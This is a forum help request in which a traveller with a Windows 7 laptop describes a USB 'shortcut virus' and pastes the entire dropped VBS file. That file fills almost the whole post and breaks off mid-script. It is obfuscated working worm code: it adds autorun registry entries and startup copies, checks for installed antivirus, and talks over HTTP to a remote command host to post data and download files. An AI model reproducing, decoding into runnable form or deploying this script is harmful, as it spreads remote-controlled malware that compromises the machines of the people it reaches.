Pests of all kinds and how to fight them: Flash Drive Shortcut Virus wtbchkxbde..vbs (Windows 7)
11.04.2014, 23:50 | #1 |
Flash Drive Shortcut Virus wtbchkxbde..vbs

Hello Trojaner-Board,

I am currently on an internship semester in the rainforest of Papua New Guinea, and the internet here is very poor but nevertheless quite expensive. So I ask for your understanding that I have not downloaded any programs or created log files in advance; I will do so if you consider it necessary, but I would ask you to always think of the most bandwidth-friendly option and perhaps post me a link to it, since every kilobyte costs real money. If the solution to my problem already exists somewhere here, a short pointer would be nice.

I am using Windows 7 64-bit on an Acer Aspire laptop.

I gave my USB stick to a villager here and then accessed it without thinking. All files were hidden and replaced by shortcuts. In addition, there is a file named "wtbchkxbde..vbs" on the stick, creation date 22.9.13, size 72 kB (although 90 MB are in use on the stick after formatting; no idea whether that is normal).

The .vbs contains the following text:
@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@172$@184$@182$@185$@190$@189$@174$@187$@183$@170$@182$@174$@110$@107$@114$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@105$@111$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@190$@188$@174$@187$@183$@170$@182$@174$@110$@107$@114$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@187$@184$@184$@189$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@184$@188$@105$@134$@105$@187$@184$@184$@189$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@105$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@184$@185$@174$@187$@170$@189$@178$@183$@176$@188$@194$@188$@189$@174$@182$@107$@114$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@188$@178$@183$@175$@184$@105$@178$@183$@105$@184$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@184$@188$@178$@183$@175$@184$@119$@172$@170$@185$@189$@178$@184$@183$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@10
7$@185$@181$@190$@188$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@86$@83$@105$@105$@105$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@105$@134$@105$@178$@183$@175$@105$@105$@86$@83$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@105$@134$@105$@178$@183$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@190$@185$@188$@189$@170$@187$@189$@105$@113$@114$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@151$@174$@193$@189$@86$@83$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@140$@158$@155$@155$@142$@151$@157$@168$@158$@156$@142$@155$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@117$@105$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@188$@177$@174$@181$@181$@184$@
171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@117$@105$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@189$@187$@190$@174$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@188$@189$@170$@187$@189$@190$@185$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@189$@187$@190$@174$@86$@83$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@177$@192$@178$@173$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@189$@105$@187$@184$@
184$@189$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@173$@178$@188$@180$@188$@105$@134$@105$@187$@184$@184$@189$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@105$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@181$@184$@176$@178$@172$@170$@181$@173$@178$@188$@180$@107$@114$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@173$@178$@188$@180$@105$@178$@183$@105$@173$@178$@188$@180$@188$@86$@83$@105$@105$@105$@105$@178$@175$@105$@105$@173$@178$@188$@180$@119$@191$@184$@181$@190$@182$@174$@188$@174$@187$@178$@170$@181$@183$@190$@182$@171$@174$@187$@105$@133$@135$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@177$@192$@178$@173$@105$@134$@105$@173$@178$@188$@180$@119$@191$@184$@181$@190$@182$@174$@188$@174$@187$@178$@170$@181$@183$@190$@182$@171$@174$@187$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@172$@190$@187$@178$@189$@194$@105$@134$@105$@107$@107$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@18
5$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@172$@184$@181$@178$@189$@174$@182$@188$@105$@134$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@184$@185$@174$@187$@170$@189$@178$@183$@176$@188$@194$@188$@189$@174$@182$@107$@117$@117$@125$@129$@114$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@178$@189$@174$@182$@105$@178$@183$@105$@172$@184$@181$@178$@189$@174$@182$@188$@86$@83$@105$@105$@105$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@184$@171$@179$@178$@189$@174$@182$@119$@191$@174$@187$@188$@178$@184$@183$@117$@107$@119$@107$@114$@86$@83$@183$@174$@193$@189$@86$@83$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@172$@184$@181$@178$@189$@174$@182$@188$@119$@191$@174$@187$@188$@178$@184$@183$@117$@107$@119$@107$@114$@86$@83$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@113$@121$@114$@105$@111$@105$@107$@119$@107$@86$@83$@175$@184$@187$@105$@105$@193$@105$@134$@105$@122$@105$@189$@184$@105$@190$@171$@184$@190$@183$@173$@105$@113$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@114$@86$@83$@82$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@111$@105$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@113$@178$@114$@86$@83$@183$@174$@193$@189$@86$@83$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@174$@191$@170$@181$@105$@113$@184$@188$@191$@174$@187$@188$@178$@184$@183$@114$@86$@83$@178$@
175$@105$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@135$@105$@127$@105$@189$@177$@174$@183$@105$@188$@172$@105$@134$@105$@107$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@123$@107$@105$@174$@181$@188$@174$@105$@188$@172$@105$@134$@105$@107$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@107$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@165$@165$@181$@184$@172$@170$@181$@177$@184$@188$@189$@165$@187$@184$@184$@189$@165$@107$@105$@111$@105$@188$@172$@114$@86$@83$@156$@174$@189$@105$@172$@184$@181$@170$@183$@189$@178$@191$@178$@187$@190$@188$@105$@134$@105$@184$@171$@179$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@170$@183$@189$@178$@191$@178$@187$@190$@188$@185$@187$@184$@173$@190$@172$@189$@107$@117$@107$@192$@186$@181$@107$@117$@121$@114$@86$@83$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@170$@183$@189$@178$@191$@178$@187$@190$@188$@105$@178$@183$@105$@172$@184$@181$@170$@183$@189$@178$@191$@178$@187$@190$@188$@86$@83$@105$@105$@105$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@111$@105$@184$@171$@179$@170$@183$@189$@178$@191$@178$@187$@190$@188$@119$@173$@178$@188$@185$@181$@170$@194$@183$@170$@182$@174$@105$@111$@105$@107$@105$@119$@107$@86$@83$@183$@174$@193$@189$@86$@83$@178$@175$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@107$@183$@170$@183$@118$@170$@191$@107$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86
$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@178$@183$@188$@189$@170$@183$@172$@174$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@111$@105$@107$@165$@107$@114$@86$@83$@178$@175$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@178$@175$@105$@181$@172$@170$@188$@174$@105$@113$@105$@182$@178$@173$@113$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@123$@114$@114$@105$@134$@105$@107$@131$@165$@107$@105$@111$@105$@105$@181$@172$@170$@188$@174$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@189$@187$@190$@174$@105$@118$@105$@107$@105$@111$@105$@173$@170$@189$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@105$@111$@105$@107$@165$@107$@117$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@117$@105$@107$@155$@142$@144$@168
$@156$@163$@107$@86$@83$@105$@105$@105$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@175$@170$@181$@188$@174$@105$@118$@105$@107$@105$@111$@105$@173$@170$@189$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@105$@111$@105$@107$@165$@107$@117$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@86$@83$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@86$@83$@86$@83$@86$@83$@190$@185$@188$@189$@170$@187$@189$@86$@83$@188$@174$@189$@105$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@114$@86$@83$@188$@174$@189$@105$@178$@183$@188$@189$@170$@181$@181$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@86$@83$@178$@175$@105$@105$@181$@172$@170$@188$@174$@105$@113$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@114$@105$@133$@135$@105$
@181$@172$@170$@188$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@175$@190$@181$@181$@183$@170$@182$@174$@188$@177$@184$@187$@189$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@114$@105$@189$@177$@174$@183$@105$@86$@83$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@140$@177$@187$@113$@124$@125$@114$@86$@83$@105$@105$@105$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@105$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@174$@187$@187$@119$@172$@181$@174$@170$@187$@86$@83$@188$@174$@189$@105$@184$@183$@174$@184$@183$@172$@174$@105$@134$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@184$@185$@174$@183$@189$@174$@193$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@129$@117$@105$@175$@170$@181$@188$@174$@114$@86$@83$@178$@175$@105$@105$@174$@187$@187$@119$@183$@190$@182$@171$@174$@187$@105$@135$@105$@121$@105$@189$@177$@174$@183$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@188$@178$@189$@174$@173$@184$@192$@183$@181$@184$@170$@173$@174$@187$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@175$@178$@181$@174$@183$@170$@182$@174$@114$@86$@83$@86$@83$@188$@189$@187$@181$@178$@183$@180$@105$@134$@105$@175$@178$@181$@174$@190$@187$@181$@86$@83$@188$@189$@187$@188$@170$@191$@174$@189$@184$@105$@134$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@175$@178$@181$@174$@183$@170$@182$@174$@86$@83$@188$@174$@189$@105$@184$@171$@179$@17
7$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@105$@114$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@184$@185$@174$@183$@105$@107$@176$@174$@189$@107$@117$@105$@188$@189$@187$@181$@178$@183$@180$@117$@105$@175$@170$@181$@188$@174$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@174$@183$@173$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@105$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@178$@175$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@105$@86$@83$@178$@175$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@189$@170$@189$@190$@188$@105$@134$@105$@123$@121$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@173$@178$@182$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@105$@105$@105$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$
@86$@83$@105$@105$@105$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@82$@82$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@82$@82$@119$@184$@185$@174$@183$@86$@83$@82$@82$@119$@192$@187$@178$@189$@174$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@187$@174$@188$@185$@184$@183$@188$@174$@171$@184$@173$@194$@86$@83$@82$@82$@119$@188$@170$@191$@174$@189$@184$@175$@178$@181$@174$@105$@188$@189$@187$@188$@170$@191$@174$@189$@184$@86$@83$@82$@82$@119$@172$@181$@184$@188$@174$@86$@83$@105$@105$@105$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@105$@105$@105$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@176$@174$@189$@175$@178$@181$@174$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@86$@83$@174$@183$@173$@105$@178$@175$@105$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@188$@190$@171$@105$@173$@184$@192$@183$@181$@184$@170$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@175$@178$@181$@174$@173$@178$@187$@114$@86$@83$@86$@83$@178$@175$@105$@175$@178$@181$@174$@173$@178$@187$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@105$@86$@83$@105$@105$@105$@175$@178$@181$@174$@173$@178$@187$@105$@134$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@86$@83$@188$@189$@187$@188$@170$@191$@174$@1
89$@184$@105$@134$@105$@175$@178$@181$@174$@173$@178$@187$@105$@111$@105$@182$@178$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@105$@178$@183$@188$@189$@187$@187$@174$@191$@105$@113$@175$@178$@181$@174$@190$@187$@181$@117$@107$@165$@107$@114$@105$@116$@105$@122$@114$@86$@83$@188$@174$@189$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@187$@189$@105$@111$@107$@120$@107$@105$@111$@105$@107$@178$@188$@118$@188$@174$@183$@173$@178$@183$@176$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@111$@105$@175$@178$@181$@174$@190$@187$@181$@117$@105$@175$@170$@181$@188$@174$@86$@83$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@174$@183$@173$@105$@107$@107$@86$@83$@105$@105$@105$@105$@105$@86$@83$@188$@174$@189$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@105$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@178$@175$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@188$@189$